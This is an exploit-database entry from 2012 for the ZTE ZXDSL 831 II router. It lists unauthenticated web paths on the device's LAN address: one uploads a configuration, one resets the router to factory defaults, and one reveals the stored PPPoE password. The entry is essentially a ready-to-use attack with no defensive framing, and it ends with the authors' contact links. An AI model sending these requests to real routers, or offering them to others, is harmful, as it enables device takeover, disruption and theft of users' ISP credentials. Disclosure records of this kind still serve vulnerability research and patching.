id: 19492
date: 09/29/2012
title: ZTE ZXDSL 831 II V7.5.0a_Z29_OV Update config / restore default
author: The Black Devils
cves: 

# Exploit Title: ZTE ZXDSL 831 II V7.5.0a_Z29_OV Update config / restoredefault 
# Date: 04/09/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# hardwarelink :[ N / A ]
# Category : [ webapps ]
# Google dork: [ N / A ]
# Tested on: [Windows] & [Ubuntu]

-------------------------------
Update config
http://192.168.1.1/upload.cgi

------
restore default 
http://192.168.1.1/resetrouter.cgi

------

read pppoe password 
http://192.168.1.1/pppoe.cgi


-------------------------------


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------



#  0day.today [2023-03-24]  #